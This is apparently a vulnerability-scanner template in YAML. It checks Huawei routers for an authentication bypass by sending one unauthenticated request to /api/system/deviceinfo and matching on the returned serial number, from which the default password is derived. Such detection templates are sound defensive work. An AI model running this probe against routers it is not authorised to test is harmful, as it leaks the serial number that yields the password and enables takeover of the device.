id: huawei-router-auth-bypass

info:
  name: Huawei Router - Authentication Bypass
  author: gy741
  severity: critical
  description: Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device.
  reference:
    - https://www.exploit-db.com/exploits/48310
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-288
  metadata:
    max-request: 1
  tags: auth-bypass,router,edb,huawei

http:
  - raw:
      - |
        GET /api/system/deviceinfo HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Referer: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "DeviceName"
          - "SerialNumber"
          - "HardwareVersion"
        condition: and

# digest: 4a0a00473045022100dad2e64cfe1e58f0bad69d1da6ede13447ad1a58f60e8dcb50a1946e8980e63f02203a2282329ce371bf8d213ace5f75e364d5d78dc0dd505b85474bbee7babe5447:922c64590222798bb761d5b6d8e72950